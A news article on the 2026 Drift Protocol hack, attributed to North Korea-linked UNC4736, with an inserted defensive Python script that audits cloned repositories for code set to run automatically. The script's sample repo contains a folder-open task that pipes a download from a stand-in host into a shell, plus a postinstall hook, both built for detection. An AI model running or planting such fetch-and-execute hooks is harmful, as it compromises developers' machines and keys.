That high-net-worth client you meet may be a "mercenary" for North Korean hackers

By: rootdata|2026/04/08 00:40:40

Original Author: Nicky, Foresight News

Drift Protocol has released its latest findings on the attack, stating that it was carried out by the same threat actor behind the October 2024 Radiant Capital hack, with strong overlap in both on-chain fund flows and tradecraft. Security firm Mandiant attributed the Radiant Capital attack to UNC4736, a group linked to the North Korean government.

After the Drift attack, the hackers have accumulated 130,293 ETH, worth approximately $266 million. The incident affected 20 protocols, including Prime Numbers Fi, Gauntlet, Elemental DeFi, Project 0, among others. Prime Numbers Fi estimated losses exceeding $10 million, Gauntlet around $6.4 million, Neutral Trade around $3.67 million, and Elemental DeFi around $2.9 million, with Elemental expressing hopes of receiving partial compensation from Drift.

Drift stated that the attack was a meticulously planned operation lasting six months. In the fall of 2025, a group claiming to be a quantitative trading company approached Drift contributors at a major crypto conference. Based on the timeline, the major crypto conferences during this period included Korea Blockchain Week 2025 (September 22 to 28, 2025, held in Seoul), TOKEN2049 Singapore (October 1 to 2, 2025, held in Singapore), Binance Blockchain Week Dubai 2025 (October 30 to 31, 2025, held in Dubai), and Solana Breakpoint Dubai (November 20 to 21, 2025, held in Dubai).

According to Drift, the group was technically skilled, had verifiable professional backgrounds, and was very familiar with how Drift operates. The two sides set up a Telegram group and, over the following months, held substantive discussions about trading strategies and vault (treasury) integration.

Between December 2025 and January 2026 the group formally onboarded as an ecosystem vault on Drift, completing the required strategy-detail forms. They held multiple working sessions with several contributors, raised detailed product questions, and deposited more than $1 million of their own funds. Through patient, methodical activity they built a fully functional business presence inside the Drift ecosystem.

Integration discussions continued until March of this year. Several Drift contributors met face-to-face with these individuals again at various international conferences. By this time, both parties had established a nearly six-month cooperative relationship, and the other party was no longer a stranger but a partner they had worked with. During this period, they shared links to projects, tools, and applications they claimed to be building, which is a common practice among trading firms.

After the attack on April 2, investigators carried out a full forensic review of the known affected devices, accounts, and communication records, and identified the interactions with this trading team as the most likely intrusion path. By the time of the attack, the counterparty's Telegram chat history and the malware had already been wiped.

The investigation found three possible routes by which the attackers could have compromised Drift contributors' devices. One contributor may have been compromised after cloning a code repository the team shared, presented as the front end for deploying their vault. Another was induced to install a TestFlight app that the group described as its wallet product. On the repository route, from December 2025 to February 2026 the security community repeatedly warned of known vulnerabilities in VS Code and Cursor in which merely opening a file, folder, or repository in the editor could silently execute arbitrary code, with no click and no prompt. A complete forensic analysis of the affected hardware is still ongoing.
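The repository route described above, a clone that runs code the moment it is opened or installed, is something the receiving team can check for before opening it. The Python script below is an added example, not Drift's code and not from the editor vendors: it audits a cloned directory for common auto-run surfaces (a VS Code task with `runOn: folderOpen`, workspace settings such as `typescript.tsdk` that make the editor load a module from the repo, npm lifecycle scripts, direnv and JetBrains run configurations). The file list, the settings keys, the sample repository it builds and the URL inside it are the author's assumptions for illustration; it does not claim to enumerate the specific VS Code or Cursor issues the article refers to.

```python
"""Pre-open audit of a freshly cloned repository.

Added example, not code from Drift or from any editor vendor. Before a
cloned repository is opened in an IDE (or `npm install` is run in it), list
the files that can make code execute without any further click. The file
list, JSON keys and sample repo below are assumptions, not a complete
catalogue of auto-run surfaces.
"""
import json
import re
import tempfile
from pathlib import Path

# npm lifecycle scripts that run automatically during `npm install`.
NPM_AUTORUN_SCRIPTS = {"preinstall", "install", "postinstall", "prepare"}

# Workspace settings that point the editor at something it will execute or load
# (assumed list; extend for your own toolchain).
RISKY_SETTING_PREFIXES = (
    "terminal.integrated.",         # shell profiles, env, automation shell
    "typescript.tsdk",              # editor loads a JS module from this path
    "python.defaultInterpreterPath",
    "git.path",
)


def _jsonc(path: Path, rel: str, findings: list) -> dict:
    """Parse VS Code-style JSON (// comments allowed); record a finding if it fails."""
    try:
        text = re.sub(r"^\s*//.*$", "", path.read_text(encoding="utf-8"), flags=re.M)
        data = json.loads(text)
        return data if isinstance(data, dict) else {}
    except (json.JSONDecodeError, UnicodeDecodeError):
        findings.append((rel, "unparseable JSON; inspect manually"))
        return {}


def audit_repo(root: Path) -> list[tuple[str, str]]:
    """Return (relative path, reason) for every auto-execution surface found."""
    findings: list[tuple[str, str]] = []

    rel = ".vscode/tasks.json"
    if (root / rel).is_file():
        for task in _jsonc(root / rel, rel, findings).get("tasks", []):
            if isinstance(task, dict) and task.get("runOptions", {}).get("runOn") == "folderOpen":
                findings.append((rel, f"task {task.get('label')!r} runs on folder open: "
                                      f"{task.get('command')!r}"))

    rel = ".vscode/settings.json"
    if (root / rel).is_file():
        for key, value in _jsonc(root / rel, rel, findings).items():
            if key.startswith(RISKY_SETTING_PREFIXES):
                findings.append((rel, f"{key} = {value!r}"))

    rel = ".vscode/launch.json"
    if (root / rel).is_file():
        for cfg in _jsonc(root / rel, rel, findings).get("configurations", []):
            if isinstance(cfg, dict) and "preLaunchTask" in cfg:
                findings.append((rel, f"debug config {cfg.get('name')!r} has "
                                      f"preLaunchTask {cfg['preLaunchTask']!r}"))

    rel = "package.json"
    if (root / rel).is_file():
        scripts = _jsonc(root / rel, rel, findings).get("scripts", {})
        for name in sorted(set(scripts) & NPM_AUTORUN_SCRIPTS):
            findings.append((rel, f"npm lifecycle script {name}: {scripts[name]!r}"))

    for rel, reason in ((".envrc", "direnv executes this shell file on cd"),
                        (".idea/workspace.xml", "JetBrains run configurations may start on open")):
        if (root / rel).is_file():
            findings.append((rel, reason))
    return findings


def build_sample_repo() -> Path:
    """Constructed sample: a 'vault front end' clone carrying three auto-run surfaces."""
    root = Path(tempfile.mkdtemp(prefix="cloned-repo-"))
    (root / ".vscode").mkdir()
    (root / ".vscode" / "tasks.json").write_text(json.dumps({
        "version": "2.0.0",
        "tasks": [{
            "label": "setup", "type": "shell",
            # hypothetical URL, constructed for the example
            "command": "curl -s https://example.invalid/setup.sh | sh",
            "runOptions": {"runOn": "folderOpen"},
        }],
    }))
    (root / ".vscode" / "settings.json").write_text(
        "// workspace settings\n" + json.dumps({"typescript.tsdk": "./tooling/tsdk"}))
    (root / "package.json").write_text(json.dumps({
        "name": "vault-frontend",
        "scripts": {"postinstall": "node ./scripts/telemetry.js", "build": "vite build"},
    }))
    (root / "src").mkdir()
    (root / "src" / "app.tsx").write_text("export default () => null;\n")
    return root


if __name__ == "__main__":
    for path, reason in audit_repo(build_sample_repo()):
        print(f"{path}: {reason}")
```

Run it against the clone before opening the folder or installing dependencies. A clean result is not proof of safety: the dependency tree, editor extensions and anything the editor itself mis-handles are out of scope, so partner-supplied code still belongs in a disposable VM that holds no wallet or signing keys.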

The operation is linked to the same threat actor behind the October 2024 Radiant Capital hack. Mandiant attributed the Radiant attack to UNC4736, a North Korean state-sponsored group also tracked as AppleJeus or Citrine Sleet. The attribution rests on two points: on-chain, the funds used to prepare and test this operation trace back to the Radiant attackers; operationally, the cover identities used in this campaign show identifiable overlap with known North Korea-linked activity.

Drift pointed out that the individuals who appeared at the offline meetings were not of North Korean nationality. Such high-level North Korean threat actors typically establish face-to-face relationships through third-party intermediaries.

UNC4736 is a cluster of threat actors tracked by Mandiant, with high confidence assessments linking it to the North Korean Reconnaissance General Bureau. This organization has continuously targeted the cryptocurrency and fintech industries since 2018, stealing digital assets through supply chain attacks, social engineering, and malware delivery.

Known major incidents include the March 2023 3CX supply-chain attack, the $50 million theft from Radiant Capital in 2024, and the $285 million theft from Drift, which together put the group's take at roughly $335 million.

This cluster is widely regarded as a subset of the Lazarus Group, focusing on financially motivated cybercrime. The Lazarus Group stole approximately $1.5 billion in assets from Bybit in February 2025, marking the largest single theft in cryptocurrency history.

Lazarus Group is a cluster of cyber threat actors backed by the North Korean government and operating under the Reconnaissance General Bureau; it comprises multiple sub-clusters, including UNC4736 (AppleJeus/Citrine Sleet) and TraderTraitor. According to Chainalysis, North Korea-linked actors such as Lazarus have stolen approximately $6.75 billion in cryptocurrency, more than $2 billion of it in 2025 alone.

The group has been responsible for several globally publicized attacks: the 2014 Sony Pictures Entertainment hack, the $81 million theft from the Bangladesh central bank in 2016, the global WannaCry ransomware outbreak in 2017, the $620 million Ronin Bridge and $100 million Harmony Horizon Bridge thefts in 2022, and the attacks on Atomic Wallet and Stake in 2023. In October 2024 UNC4736 attacked Radiant Capital, stealing $50 million; in February 2025 TraderTraitor stole a record $1.5 billion from Bybit; and in April 2026 UNC4736 carried out the $285 million attack on Drift Protocol.

Lazarus-linked activity has brought North Korea's cumulative cryptocurrency theft to roughly $6.75 billion. Its tradecraft has shifted from early destructive attacks to long-term infiltration, social engineering, supply-chain compromise, and manipulation of smart contracts and multisig signers.

Drift's statement noted that the identities used in the in-person, third-party-fronted engagement had complete personal and professional histories, including work experience, public credentials, and professional networks. The individuals Drift contributors met offline had spent months building profiles that could withstand the scrutiny normally applied to a business partner.

Security researcher Taylor Monahan previously stated that North Korean IT workers have been infiltrating cryptocurrency companies and DeFi projects for at least seven years, with over 40 DeFi platforms having North Korean IT workers involved at various stages. The Drift incident further indicates that the attackers have evolved from remote job infiltration to face-to-face, months-long targeted intelligence operations.

Drift stated that it will continue to work with law enforcement, forensic partners, and ecosystem teams, with further details to be released once the investigation is complete. All remaining protocol functions have been frozen, the compromised wallets have been removed from the multisig, and the attackers' addresses have been flagged with exchanges and cross-chain bridge operators.
